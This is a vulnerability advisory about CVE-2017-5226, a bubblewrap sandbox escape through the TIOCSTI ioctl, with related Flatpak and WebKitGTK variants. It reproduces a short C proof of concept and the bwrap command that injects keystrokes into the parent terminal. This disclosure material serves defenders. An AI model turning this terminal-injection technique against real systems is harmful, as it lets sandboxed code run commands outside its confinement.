Headline
CVE-2017-5226: CVE-2017-5226 -- bubblewrap escape via TIOCSTI ioctl · Issue #142 · containers/bubblewrap
When executing a program via the bubblewrap sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal’s input buffer, allowing an attacker to escape the sandbox.
On Debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702, Federico Bento <[email protected]> writes:
When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal’s input buffer, allowing an attacker
to escape the sandbox.This has been assigned CVE-2017-5226.
$ cat test.c #include <unistd.h> #include <sys/ioctl.h> #include <termios.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); execlp("/bin/id", "id", NULL); } $ gcc test.c -o /tmp/test $ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test id uid=0 gid=1000 groups=1000 $ id <------ did not type this uid=1000(saken) gid=1000(saken) groups=1000(saken)
I don’t know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.
Related news
Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. Versions prior to 1.10.8, 1.12.8, 1.14.4, and 1.15.4 contain a vulnerability similar to CVE-2017-5226, but using the `TIOCLINUX` ioctl command instead of `TIOCSTI`. If a Flatpak app is run on a Linux virtual console such as `/dev/tty1`, it can copy text from the virtual console and paste it into the command buffer, from which the command might be run after the Flatpak app has exited. Ordinary graphical terminal emulators like xterm, gnome-terminal and Konsole are unaffected. This vulnerability is specific to the Linux virtual consoles `/dev/tty1`, `/dev/tty2` and so on. A patch is available in versions 1.10.8, 1.12.8, 1.14.4, and 1.15.4. As a workaround, don't run Flatpak on a Linux virtual console. Flatpak is primarily designed to be used in a Wayland or X11 graphical environment.
The bubblewrap sandbox of WebKitGTK and WPE WebKit, prior to 2.28.3, failed to properly block access to CLONE_NEWUSER and the TIOCSTI ioctl. CLONE_NEWUSER could potentially be used to confuse xdg-desktop-portal, which allows access outside the sandbox. TIOCSTI can be used to directly execute commands outside the sandbox by writing to the controlling terminal's input buffer, similar to CVE-2017-5226.